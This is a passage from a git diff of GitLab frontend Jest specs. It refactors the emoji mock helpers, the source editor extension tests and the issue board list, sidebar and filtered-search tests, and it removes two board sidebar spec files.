EMOJI_VERSION } from '~/emoji'; -import axios from '~/lib/utils/axios_utils'; window.gl = window.gl || {}; window.gon = window.gon || {}; -let mock; let awardsHandler = null; const urlRoot = gon.relative_url_root; @@ -76,8 +73,7 @@ describe('AwardsHandler', () => { }; beforeEach(async () => { - mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, emojiData); + await initEmojiMock(emojiData); loadFixtures('snippets/show.html'); @@ -89,7 +85,7 @@ describe('AwardsHandler', () => { // restore original url root value gon.relative_url_root = urlRoot; - mock.restore(); + clearEmojiMock(); // Undo what we did to the shared <body> $('body').removeAttr('data-page'); diff --git a/spec/frontend/behaviors/gl_emoji_spec.js b/spec/frontend/behaviors/gl_emoji_spec.js index d23a0a84997..0f4e2e08dbd 100644 --- a/spec/frontend/behaviors/gl_emoji_spec.js +++ b/spec/frontend/behaviors/gl_emoji_spec.js @@ -1,15 +1,13 @@ -import MockAdapter from 'axios-mock-adapter'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import waitForPromises from 'helpers/wait_for_promises'; import installGlEmojiElement from '~/behaviors/gl_emoji'; -import { initEmojiMap, EMOJI_VERSION } from '~/emoji'; +import { EMOJI_VERSION } from '~/emoji'; import * as EmojiUnicodeSupport from '~/emoji/support'; -import axios from '~/lib/utils/axios_utils'; jest.mock('~/emoji/support'); describe('gl_emoji', () => { - let mock; const emojiData = { grey_question: { c: 'symbols', @@ -38,15 +36,12 @@ describe('gl_emoji', () => { return div.firstElementChild; } - beforeEach(() => { - mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, emojiData); - - return initEmojiMap().catch(() => {}); + beforeEach(async () => { + await initEmojiMock(emojiData); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); document.body.innerHTML = ''; }); diff --git a/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap b/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap index dfa6b99080b..46a5631b028 100644 --- a/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap +++ b/spec/frontend/blob/components/__snapshots__/blob_header_filepath_spec.js.snap @@ -34,6 +34,7 @@ exports[`Blob Header Filepath rendering matches the snapshot 1`] = ` text="foo/bar/dummy.md" title="Copy file path" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/blob/viewer/index_spec.js b/spec/frontend/blob/viewer/index_spec.js index 705c4630a68..061ac7ad167 100644 --- a/spec/frontend/blob/viewer/index_spec.js +++ b/spec/frontend/blob/viewer/index_spec.js @@ -28,7 +28,7 @@ describe('Blob viewer', () => { loadFixtures('blob/show_readme.html'); $('#modal-upload-blob').remove(); - mock.onGet(/blob\/master\/README\.md/).reply(200, { + mock.onGet(/blob\/.+\/README\.md/).reply(200, { html: '<div>testing</div>', }); diff --git a/spec/frontend/blob_edit/edit_blob_spec.js b/spec/frontend/blob_edit/edit_blob_spec.js index ebef0656750..9c974e79e6e 100644 --- a/spec/frontend/blob_edit/edit_blob_spec.js +++ b/spec/frontend/blob_edit/edit_blob_spec.js @@ -1,14 +1,29 @@ import waitForPromises from 'helpers/wait_for_promises'; import EditBlob from '~/blob_edit/edit_blob'; +import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import { FileTemplateExtension } from '~/editor/extensions/source_editor_file_template_ext'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; import SourceEditor from '~/editor/source_editor'; jest.mock('~/editor/source_editor'); -jest.mock('~/editor/extensions/source_editor_markdown_ext'); +jest.mock('~/editor/extensions/source_editor_extension_base'); jest.mock('~/editor/extensions/source_editor_file_template_ext'); +jest.mock('~/editor/extensions/source_editor_markdown_ext'); +jest.mock('~/editor/extensions/source_editor_markdown_livepreview_ext'); const PREVIEW_MARKDOWN_PATH = '/foo/bar/preview_markdown'; +const defaultExtensions = [ + { definition: SourceEditorExtension }, + { definition: FileTemplateExtension }, +]; +const markdownExtensions = [ + { definition: EditorMarkdownExtension }, + { + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath: PREVIEW_MARKDOWN_PATH }, + }, +]; describe('Blob Editing', () => { const useMock = jest.fn(); @@ -29,7 +44,9 @@ describe('Blob Editing', () => { jest.spyOn(SourceEditor.prototype, 'createInstance').mockReturnValue(mockInstance); }); afterEach(() => { + SourceEditorExtension.mockClear(); EditorMarkdownExtension.mockClear(); + EditorMarkdownPreviewExtension.mockClear(); FileTemplateExtension.mockClear(); }); @@ -45,26 +62,22 @@ describe('Blob Editing', () => { await waitForPromises(); }; - it('loads FileTemplateExtension by default', async () => { + it('loads SourceEditorExtension and FileTemplateExtension by default', async () => { await initEditor(); - expect(useMock).toHaveBeenCalledWith(expect.any(FileTemplateExtension)); - expect(FileTemplateExtension).toHaveBeenCalledTimes(1); + expect(useMock).toHaveBeenCalledWith(defaultExtensions); }); describe('Markdown', () => { - it('does not load MarkdownExtension by default', async () => { + it('does not load MarkdownExtensions by default', async () => { await initEditor(); expect(EditorMarkdownExtension).not.toHaveBeenCalled(); + expect(EditorMarkdownPreviewExtension).not.toHaveBeenCalled(); }); it('loads MarkdownExtension only for the markdown files', async () => { await initEditor(true); - expect(useMock).toHaveBeenCalledWith(expect.any(EditorMarkdownExtension)); - expect(EditorMarkdownExtension).toHaveBeenCalledTimes(1); - expect(EditorMarkdownExtension).toHaveBeenCalledWith({ - instance: mockInstance, - previewMarkdownPath: PREVIEW_MARKDOWN_PATH, - }); + expect(useMock).toHaveBeenCalledTimes(2); + expect(useMock.mock.calls[1]).toEqual([markdownExtensions]); }); }); diff --git a/spec/frontend/boards/board_list_helper.js b/spec/frontend/boards/board_list_helper.js index 811f0043a01..d0f14bd37c1 100644 --- a/spec/frontend/boards/board_list_helper.js +++ b/spec/frontend/boards/board_list_helper.js @@ -1,4 +1,5 @@ import { createLocalVue, shallowMount } from '@vue/test-utils'; +import VueApollo from 'vue-apollo'; import Vuex from 'vuex'; import BoardCard from '~/boards/components/board_card.vue'; @@ -6,7 +7,15 @@ import BoardList from '~/boards/components/board_list.vue'; import BoardNewIssue from '~/boards/components/board_new_issue.vue'; import BoardNewItem from '~/boards/components/board_new_item.vue'; import defaultState from '~/boards/stores/state'; -import { mockList, mockIssuesByListId, issues, mockGroupProjects } from './mock_data'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import listQuery from 'ee_else_ce/boards/graphql/board_lists_deferred.query.graphql'; +import { + mockList, + mockIssuesByListId, + issues, + mockGroupProjects, + boardListQueryResponse, +} from './mock_data'; export default function createComponent({ listIssueProps = {}, @@ -15,16 +24,23 @@ export default function createComponent({ actions = {}, getters = {}, provide = {}, + data = {}, state = defaultState, stubs = { BoardNewIssue, BoardNewItem, BoardCard, }, + issuesCount, } = {}) { const localVue = createLocalVue(); + localVue.use(VueApollo); localVue.use(Vuex); + const fakeApollo = createMockApollo([ + [listQuery, jest.fn().mockResolvedValue(boardListQueryResponse(issuesCount))], + ]); + const store = new Vuex.Store({ state: { selectedProject: mockGroupProjects[0], @@ -68,6 +84,7 @@ export default function createComponent({ } const component = shallowMount(BoardList, { + apolloProvider: fakeApollo, localVue, store, propsData: { @@ -87,6 +104,11 @@ export default function createComponent({ ...provide, }, stubs, + data() { + return { + ...data, + }; + }, }); return component; diff --git a/spec/frontend/boards/board_list_spec.js b/spec/frontend/boards/board_list_spec.js index 6f623eab1af..1981ed5ab7f 100644 --- a/spec/frontend/boards/board_list_spec.js +++ b/spec/frontend/boards/board_list_spec.js @@ -38,7 +38,7 @@ describe('Board list component', () => { describe('When Expanded', () => { beforeEach(() => { - wrapper = createComponent(); + wrapper = createComponent({ issuesCount: 1 }); }); it('renders component', () => { @@ -97,14 +97,6 @@ describe('Board list component', () => { await wrapper.vm.$nextTick(); expect(wrapper.find('.board-list-count').attributes('data-issue-id')).toBe('-1'); }); - - it('shows how many more issues to load', async () => { - wrapper.vm.showCount = true; - wrapper.setProps({ list: { issuesCount: 20 } }); - - await wrapper.vm.$nextTick(); - expect(wrapper.find('.board-list-count').text()).toBe('Showing 1 of 20 issues'); - }); }); describe('load more issues', () => { @@ -113,9 +105,7 @@ describe('Board list component', () => { }; beforeEach(() => { - wrapper = createComponent({ - listProps: { issuesCount: 25 }, - }); + wrapper = createComponent(); }); it('does not load issues if already loading', () => { @@ -131,13 +121,27 @@ describe('Board list component', () => { it('shows loading more spinner', async () => { wrapper = createComponent({ state: { listsFlags: { 'gid://gitlab/List/1': { isLoadingMore: true } } }, + data: { + showCount: true, + }, }); - wrapper.vm.showCount = true; await wrapper.vm.$nextTick(); expect(findIssueCountLoadingIcon().exists()).toBe(true); }); + + it('shows how many more issues to load', async () => { + // wrapper.vm.showCount = true; + wrapper = createComponent({ + data: { + showCount: true, + }, + }); + + await wrapper.vm.$nextTick(); + expect(wrapper.find('.board-list-count').text()).toBe('Showing 1 of 20 issues'); + }); }); describe('max issue count warning', () => { diff --git a/spec/frontend/boards/components/board_content_sidebar_spec.js b/spec/frontend/boards/components/board_content_sidebar_spec.js index 8a8250205d0..7b176cea2a3 100644 --- a/spec/frontend/boards/components/board_content_sidebar_spec.js +++ b/spec/frontend/boards/components/board_content_sidebar_spec.js @@ -1,18 +1,20 @@ import { GlDrawer } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { MountingPortal } from 'portal-vue'; +import Vue from 'vue'; import Vuex from 'vuex'; import SidebarDropdownWidget from 'ee_else_ce/sidebar/components/sidebar_dropdown_widget.vue'; import { stubComponent } from 'helpers/stub_component'; import BoardContentSidebar from '~/boards/components/board_content_sidebar.vue'; -import BoardSidebarLabelsSelect from '~/boards/components/sidebar/board_sidebar_labels_select.vue'; import BoardSidebarTitle from '~/boards/components/sidebar/board_sidebar_title.vue'; import { ISSUABLE } from '~/boards/constants'; import SidebarDateWidget from '~/sidebar/components/date/sidebar_date_widget.vue'; import SidebarSubscriptionsWidget from '~/sidebar/components/subscriptions/sidebar_subscriptions_widget.vue'; import SidebarTodoWidget from '~/sidebar/components/todo_toggle/sidebar_todo_widget.vue'; +import SidebarLabelsWidget from '~/vue_shared/components/sidebar/labels_select_widget/labels_select_root.vue'; import { mockActiveIssue, mockIssue, mockIssueGroupPath, mockIssueProjectPath } from '../mock_data'; +Vue.use(Vuex); describe('BoardContentSidebar', () => { let wrapper; let store; @@ -32,6 +34,7 @@ describe('BoardContentSidebar', () => { groupPathForActiveIssue: () => mockIssueGroupPath, projectPathForActiveIssue: () => mockIssueProjectPath, isSidebarOpen: () => true, + isGroupBoard: () => false, ...mockGetters, }, actions: mockActions, @@ -115,8 +118,8 @@ describe('BoardContentSidebar', () => { expect(wrapper.findComponent(SidebarTodoWidget).exists()).toBe(true); }); - it('renders BoardSidebarLabelsSelect', () => { - expect(wrapper.findComponent(BoardSidebarLabelsSelect).exists()).toBe(true); + it('renders SidebarLabelsWidget', () => { + expect(wrapper.findComponent(SidebarLabelsWidget).exists()).toBe(true); }); it('renders BoardSidebarTitle', () => { diff --git a/spec/frontend/boards/components/board_filtered_search_spec.js b/spec/frontend/boards/components/board_filtered_search_spec.js index b858d6e95a0..ea551e94f2f 100644 --- a/spec/frontend/boards/components/board_filtered_search_spec.js +++ b/spec/frontend/boards/components/board_filtered_search_spec.js @@ -18,7 +18,7 @@ describe('BoardFilteredSearch', () => { { icon: 'labels', title: __('Label'), - type: 'label_name', + type: 'label', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -31,7 +31,7 @@ describe('BoardFilteredSearch', () => { { icon: 'pencil', title: __('Author'), - type: 'author_username', + type: 'author', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -97,7 +97,7 @@ describe('BoardFilteredSearch', () => { createComponent({ props: { eeFilters: { labelName: ['label'] } } }); expect(findFilteredSearch().props('initialFilterValue')).toEqual([ - { type: 'label_name', value: { data: 'label', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, ]); }); }); @@ -117,12 +117,14 @@ describe('BoardFilteredSearch', () => { it('sets the url params to the correct results', async () => { const mockFilters = [ - { type: 'author_username', value: { data: 'root', operator: '=' } }, - { type: 'label_name', value: { data: 'label', operator: '=' } }, - { type: 'label_name', value: { data: 'label2', operator: '=' } }, - { type: 'milestone_title', value: { data: 'New Milestone', operator: '=' } }, - { type: 'types', value: { data: 'INCIDENT', operator: '=' } }, + { type: 'author', value: { data: 'root', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, + { type: 'label', value: { data: 'label2', operator: '=' } }, + { type: 'milestone', value: { data: 'New Milestone', operator: '=' } }, + { type: 'type', value: { data: 'INCIDENT', operator: '=' } }, { type: 'weight', value: { data: '2', operator: '=' } }, + { type: 'iteration', value: { data: '3341', operator: '=' } }, + { type: 'release', value: { data: 'v1.0.0', operator: '=' } }, ]; jest.spyOn(urlUtility, 'updateHistory'); findFilteredSearch().vm.$emit('onFilter', mockFilters); @@ -131,7 +133,7 @@ describe('BoardFilteredSearch', () => { title: '', replace: true, url: - 'http://test.host/?author_username=root&label_name[]=label&label_name[]=label2&milestone_title=New+Milestone&types=INCIDENT&weight=2', + 'http://test.host/?author_username=root&label_name[]=label&label_name[]=label2&milestone_title=New+Milestone&iteration_id=3341&types=INCIDENT&weight=2&release_tag=v1.0.0', }); }); }); @@ -145,8 +147,8 @@ describe('BoardFilteredSearch', () => { it('passes the correct props to FilterSearchBar', () => { expect(findFilteredSearch().props('initialFilterValue')).toEqual([ - { type: 'author_username', value: { data: 'root', operator: '=' } }, - { type: 'label_name', value: { data: 'label', operator: '=' } }, + { type: 'author', value: { data: 'root', operator: '=' } }, + { type: 'label', value: { data: 'label', operator: '=' } }, ]); }); }); diff --git a/spec/frontend/boards/components/board_list_header_spec.js b/spec/frontend/boards/components/board_list_header_spec.js index 0abb00e0fa5..148d0c5684d 100644 --- a/spec/frontend/boards/components/board_list_header_spec.js +++ b/spec/frontend/boards/components/board_list_header_spec.js @@ -1,18 +1,22 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; import Vuex from 'vuex'; +import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import { mockLabelList } from 'jest/boards/mock_data'; +import { boardListQueryResponse, mockLabelList } from 'jest/boards/mock_data'; import BoardListHeader from '~/boards/components/board_list_header.vue'; import { ListType } from '~/boards/constants'; +import listQuery from 'ee_else_ce/boards/graphql/board_lists_deferred.query.graphql'; -const localVue = createLocalVue(); - -localVue.use(Vuex); +Vue.use(VueApollo); +Vue.use(Vuex); describe('Board List Header Component', () => { let wrapper; let store; + let fakeApollo; const updateListSpy = jest.fn(); const toggleListCollapsedSpy = jest.fn(); @@ -20,6 +24,7 @@ describe('Board List Header Component', () => { afterEach(() => { wrapper.destroy(); wrapper = null; + fakeApollo = null; localStorage.clear(); }); @@ -29,6 +34,7 @@ describe('Board List Header Component', () => { collapsed = false, withLocalStorage = true, currentUserId = 1, + listQueryHandler = jest.fn().mockResolvedValue(boardListQueryResponse()), } = {}) => { const boardId = '1'; @@ -56,10 +62,12 @@ describe('Board List Header Component', () => { getters: { isEpicBoard: () => false }, }); + fakeApollo = createMockApollo([[listQuery, listQueryHandler]]); + wrapper = extendedWrapper( shallowMount(BoardListHeader, { + apolloProvider: fakeApollo, store, - localVue, propsData: { disabled: false, list: listMock, diff --git a/spec/frontend/boards/components/issue_board_filtered_search_spec.js b/spec/frontend/boards/components/issue_board_filtered_search_spec.js index 45c5c87d800..76e8b84d8ef 100644 --- a/spec/frontend/boards/components/issue_board_filtered_search_spec.js +++ b/spec/frontend/boards/components/issue_board_filtered_search_spec.js @@ -1,3 +1,4 @@ +import { orderBy } from 'lodash'; import { shallowMount } from '@vue/test-utils'; import BoardFilteredSearch from 'ee_else_ce/boards/components/board_filtered_search.vue'; import IssueBoardFilteredSpec from '~/boards/components/issue_board_filtered_search.vue'; @@ -16,6 +17,7 @@ describe('IssueBoardFilter', () => { propsData: { fullPath: 'gitlab-org', boardType: 'group' }, provide: { isSignedIn, + releasesFetchPath: '/releases', }, }); }; @@ -61,7 +63,7 @@ describe('IssueBoardFilter', () => { isSignedIn, ); - expect(findBoardsFilteredSearch().props('tokens')).toEqual(tokens); + expect(findBoardsFilteredSearch().props('tokens')).toEqual(orderBy(tokens, ['title'])); }, ); }); diff --git a/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js b/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js deleted file mode 100644 index fb9d823107e..00000000000 --- a/spec/frontend/boards/components/sidebar/board_sidebar_labels_select_spec.js +++ /dev/null @@ -1,168 +0,0 @@ -import { GlLabel } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import { TEST_HOST } from 'helpers/test_constants'; -import { - labels as TEST_LABELS, - mockIssue as TEST_ISSUE, - mockIssueFullPath as TEST_ISSUE_FULLPATH, -} from 'jest/boards/mock_data'; -import BoardEditableItem from '~/boards/components/sidebar/board_editable_item.vue'; -import BoardSidebarLabelsSelect from '~/boards/components/sidebar/board_sidebar_labels_select.vue'; -import { createStore } from '~/boards/stores'; -import { getIdFromGraphQLId } from '~/graphql_shared/utils'; - -const TEST_LABELS_PAYLOAD = TEST_LABELS.map((label) => ({ ...label, set: true })); -const TEST_LABELS_TITLES = TEST_LABELS.map((label) => label.title); - -describe('~/boards/components/sidebar/board_sidebar_labels_select.vue', () => { - let wrapper; - let store; - - afterEach(() => { - wrapper.destroy(); - store = null; - wrapper = null; - }); - - const createWrapper = ({ labels = [], providedValues = {} } = {}) => { - store = createStore(); - store.state.boardItems = { [TEST_ISSUE.id]: { ...TEST_ISSUE, labels } }; - store.state.activeId = TEST_ISSUE.id; - - wrapper = shallowMount(BoardSidebarLabelsSelect, { - store, - provide: { - canUpdate: true, - labelsManagePath: TEST_HOST, - labelsFilterBasePath: TEST_HOST, - ...providedValues, - }, - stubs: { - BoardEditableItem, - LabelsSelect: true, - }, - }); - }; - - const findLabelsSelect = () => wrapper.find({ ref: 'labelsSelect' }); - const findLabelsTitles = () => - wrapper.findAll(GlLabel).wrappers.map((item) => item.props('title')); - const findCollapsed = () => wrapper.find('[data-testid="collapsed-content"]'); - - describe('when labelsFetchPath is provided', () => { - it('uses injected labels fetch path', () => { - createWrapper({ providedValues: { labelsFetchPath: 'foobar' } }); - - expect(findLabelsSelect().props('labelsFetchPath')).toEqual('foobar'); - }); - }); - - it('uses the default project label endpoint', () => { - createWrapper(); - - expect(findLabelsSelect().props('labelsFetchPath')).toEqual( - `/${TEST_ISSUE_FULLPATH}/-/labels?include_ancestor_groups=true`, - ); - }); - - it('renders "None" when no labels are selected', () => { - createWrapper(); - - expect(findCollapsed().text()).toBe('None'); - }); - - it('renders labels when set', () => { - createWrapper({ labels: TEST_LABELS }); - - expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - }); - - describe('when labels are submitted', () => { - beforeEach(async () => { - createWrapper(); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => TEST_LABELS); - findLabelsSelect().vm.$emit('updateSelectedLabels', TEST_LABELS_PAYLOAD); - store.state.boardItems[TEST_ISSUE.id].labels = TEST_LABELS; - await wrapper.vm.$nextTick(); - }); - - it('collapses sidebar and renders labels', () => { - expect(findCollapsed().isVisible()).toBe(true); - expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - }); - - it('commits change to the server', () => { - expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - addLabelIds: TEST_LABELS.map((label) => label.id), - projectPath: TEST_ISSUE_FULLPATH, - removeLabelIds: [], - iid: null, - }); - }); - }); - - describe('when labels are updated over existing labels', () => { - const testLabelsPayload = [ - { id: 5, set: true }, - { id: 6, set: false }, - { id: 7, set: true }, - ]; - const expectedLabels = [{ id: 5 }, { id: 7 }]; - - beforeEach(async () => { - createWrapper({ labels: TEST_LABELS }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => expectedLabels); - findLabelsSelect().vm.$emit('updateSelectedLabels', testLabelsPayload); - await wrapper.vm.$nextTick(); - }); - - it('commits change to the server', () => { - expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - addLabelIds: [5, 7], - removeLabelIds: [6], - projectPath: TEST_ISSUE_FULLPATH, - iid: null, - }); - }); - }); - - describe('when removing individual labels', () => { - const testLabel = TEST_LABELS[0]; - - beforeEach(async () => { - createWrapper({ labels: [testLabel] }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => {}); - }); - - it('commits change to the server', () => { - wrapper.find(GlLabel).vm.$emit('close', testLabel); - - expect(wrapper.vm.setActiveBoardItemLabels).toHaveBeenCalledWith({ - removeLabelIds: [getIdFromGraphQLId(testLabel.id)], - projectPath: TEST_ISSUE_FULLPATH, - }); - }); - }); - - describe('when the mutation fails', () => { - beforeEach(async () => { - createWrapper({ labels: TEST_LABELS }); - - jest.spyOn(wrapper.vm, 'setActiveBoardItemLabels').mockImplementation(() => { - throw new Error(['failed mutation']); - }); - jest.spyOn(wrapper.vm, 'setError').mockImplementation(() => {}); - findLabelsSelect().vm.$emit('updateSelectedLabels', [{ id: '?' }]); - await wrapper.vm.$nextTick(); - }); - - it('collapses sidebar and renders former issue weight', () => { - expect(findCollapsed().isVisible()).toBe(true); - expect(findLabelsTitles()).toEqual(TEST_LABELS_TITLES); - expect(wrapper.vm.setError).toHaveBeenCalled(); - }); - }); -}); diff --git a/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js b/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js deleted file mode 100644 index 6e1b528babc..00000000000 --- a/spec/frontend/boards/components/sidebar/board_sidebar_subscription_spec.js +++ /dev/null @@ -1,163 +0,0 @@ -import { GlToggle, GlLoadingIcon } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import Vue from 'vue'; -import Vuex from 'vuex'; -import BoardSidebarSubscription from '~/boards/components/sidebar/board_sidebar_subscription.vue'; -import { createStore } from '~/boards/stores'; -import * as types from '~/boards/stores/mutation_types'; -import { mockActiveIssue } from '../../mock_data'; - -Vue.use(Vuex); - -describe('~/boards/components/sidebar/board_sidebar_subscription_spec.vue', () => { - let wrapper; - let store; - - const findNotificationHeader = () => wrapper.find("[data-testid='notification-header-text']"); - const findToggle = () => wrapper.findComponent(GlToggle); - const findGlLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); - - const createComponent = (activeBoardItem = { ...mockActiveIssue }) => { - store = createStore(); - store.state.boardItems = { [activeBoardItem.id]: activeBoardItem }; - store.state.activeId = activeBoardItem.id; - - wrapper = mount(BoardSidebarSubscription, { - store, - provide: { - emailsDisabled: false, - }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - store = null; - jest.clearAllMocks(); - }); - - describe('Board sidebar subscription component template', () => { - it('displays "notifications" heading', () => { - createComponent(); - - expect(findNotificationHeader().text()).toBe('Notifications'); - }); - - it('renders toggle with label', () => { - createComponent(); - - expect(findToggle().props('label')).toBe(BoardSidebarSubscription.i18n.header.title); - }); - - it('renders toggle as "off" when currently not subscribed', () => { - createComponent(); - - expect(findToggle().exists()).toBe(true); - expect(findToggle().props('value')).toBe(false); - }); - - it('renders toggle as "on" when currently subscribed', () => { - createComponent({ - ...mockActiveIssue, - subscribed: true, - }); - - expect(findToggle().exists()).toBe(true); - expect(findToggle().props('value')).toBe(true); - }); - - describe('when notification emails have been disabled', () => { - beforeEach(() => { - createComponent({ - ...mockActiveIssue, - emailsDisabled: true, - }); - }); - - it('displays a message that notification have been disabled', () => { - expect(findNotificationHeader().text()).toBe( - 'Notifications have been disabled by the project or group owner', - ); - }); - - it('does not render the toggle button', () => { - expect(findToggle().exists()).toBe(false); - }); - }); - }); - - describe('Board sidebar subscription component `behavior`', () => { - const mockSetActiveIssueSubscribed = (subscribedState) => { - jest.spyOn(wrapper.vm, 'setActiveItemSubscribed').mockImplementation(async () => { - store.commit(types.UPDATE_BOARD_ITEM_BY_ID, { - itemId: mockActiveIssue.id, - prop: 'subscribed', - value: subscribedState, - }); - }); - }; - - it('subscribing to notification', async () => { - createComponent(); - mockSetActiveIssueSubscribed(true); - - expect(findGlLoadingIcon().exists()).toBe(false); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(true); - expect(wrapper.vm.setActiveItemSubscribed).toHaveBeenCalledWith({ - subscribed: true, - projectPath: 'gitlab-org/test-subgroup/gitlab-test', - }); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(false); - expect(findToggle().props('value')).toBe(true); - }); - - it('unsubscribing from notification', async () => { - createComponent({ - ...mockActiveIssue, - subscribed: true, - }); - mockSetActiveIssueSubscribed(false); - - expect(findGlLoadingIcon().exists()).toBe(false); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - - expect(wrapper.vm.setActiveItemSubscribed).toHaveBeenCalledWith({ - subscribed: false, - projectPath: 'gitlab-org/test-subgroup/gitlab-test', - }); - expect(findGlLoadingIcon().exists()).toBe(true); - - await wrapper.vm.$nextTick(); - - expect(findGlLoadingIcon().exists()).toBe(false); - expect(findToggle().props('value')).toBe(false); - }); - - it('flashes an error message when setting the subscribed state fails', async () => { - createComponent(); - jest.spyOn(wrapper.vm, 'setActiveItemSubscribed').mockImplementation(async () => { - throw new Error(); - }); - jest.spyOn(wrapper.vm, 'setError').mockImplementation(() => {}); - - findToggle().vm.$emit('change'); - - await wrapper.vm.$nextTick(); - expect(wrapper.vm.setError).toHaveBeenCalled(); - expect(wrapper.vm.setError.mock.calls[0][0].message).toBe( - wrapper.vm.$options.i18n.updateSubscribedErrorMessage, - ); - }); - }); -}); diff --git a/spec/frontend/boards/mock_data.js b/spec/frontend/boards/mock_data.js index 8fcad99f8a7..a081a60166b 100644 --- a/spec/frontend/boards/mock_data.js +++ b/spec/frontend/boards/mock_data.js @@ -2,12 +2,11 @@ import { GlFilteredSearchToken } from '@gitlab/ui'; import { keyBy } from 'lodash'; import { ListType } from '~/boards/constants'; import { __ } from '~/locale'; -import { DEFAULT_MILESTONES_GRAPHQL } from '~/vue_shared/components/filtered_search_bar/constants'; import AuthorToken from '~/vue_shared/components/filtered_search_bar/tokens/author_token.vue'; import EmojiToken from '~/vue_shared/components/filtered_search_bar/tokens/emoji_token.vue'; import LabelToken from '~/vue_shared/components/filtered_search_bar/tokens/label_token.vue'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; +import ReleaseToken from '~/vue_shared/components/filtered_search_bar/tokens/release_token.vue'; export const boardObj = { id: 1, @@ -21,7 +20,6 @@ export const listObj = { position: 0, title: 'Test', list_type: 'label', - weight: 3, label: { id: 5000, title: 'Test', @@ -154,7 +152,6 @@ export const rawIssue = { iid: '27', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: 'gitlab-org/test-subgroup/gitlab-test#27', path: '/gitlab-org/test-subgroup/gitlab-test/-/issues/27', @@ -184,7 +181,6 @@ export const mockIssue = { title: 'Issue 1', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: `${mockIssueFullPath}#27`, path: `/${mockIssueFullPath}/-/issues/27`, @@ -216,7 +212,6 @@ export const mockIssue2 = { title: 'Issue 2', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, referencePath: 'gitlab-org/test-subgroup/gitlab-test#28', path: '/gitlab-org/test-subgroup/gitlab-test/-/issues/28', @@ -234,7 +229,6 @@ export const mockIssue3 = { referencePath: '#29', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, path: '/gitlab-org/gitlab-test/-/issues/28', assignees, @@ -249,7 +243,6 @@ export const mockIssue4 = { referencePath: '#30', dueDate: null, timeEstimate: 0, - weight: null, confidential: false, path: '/gitlab-org/gitlab-test/-/issues/28', assignees, @@ -551,7 +544,7 @@ export const mockMoveData = { }; export const mockEmojiToken = { - type: 'my_reaction_emoji', + type: 'my-reaction', icon: 'thumb-up', title: 'My-Reaction', unique: true, @@ -559,11 +552,24 @@ export const mockEmojiToken = { fetchEmojis: expect.any(Function), }; -export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) => [ +export const mockConfidentialToken = { + type: 'confidential', + icon: 'eye-slash', + title: 'Confidential', + unique: true, + token: GlFilteredSearchToken, + operators: [{ value: '=', description: 'is' }], + options: [ + { icon: 'eye-slash', value: 'yes', title: 'Yes' }, + { icon: 'eye', value: 'no', title: 'No' }, + ], +}; + +export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, isSignedIn) => [ { icon: 'user', title: __('Assignee'), - type: 'assignee_username', + type: 'assignee', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -576,7 +582,7 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) { icon: 'pencil', title: __('Author'), - type: 'author_username', + type: 'author', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -590,7 +596,7 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) { icon: 'labels', title: __('Label'), - type: 'label_name', + type: 'label', operators: [ { value: '=', description: 'is' }, { value: '!=', description: 'is not' }, @@ -600,21 +606,20 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, 